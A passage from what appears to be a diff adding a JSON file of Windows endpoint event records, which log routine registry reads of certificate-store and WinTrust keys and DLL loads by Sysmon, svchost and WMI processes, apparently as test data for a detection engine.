"pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\WmiApSrv.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Refreshed", + "registry_value": "Performance Refreshed", + "timestamp": 131883573482290000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "sysmain.dll", + "image_path": "C:\\Windows\\System32\\sysmain.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480259984, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wmiprov.dll", + "image_path": "C:\\Windows\\System32\\wbem\\wmiprov.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "rasctrs.dll", + "image_path": "C:\\Windows\\System32\\rasctrs.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480259984, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "esscli.dll", + "image_path": "C:\\Windows\\System32\\wbem\\esscli.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wmiclnt.dll", + "image_path": "C:\\Windows\\System32\\wmiclnt.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573482450016, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573482610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 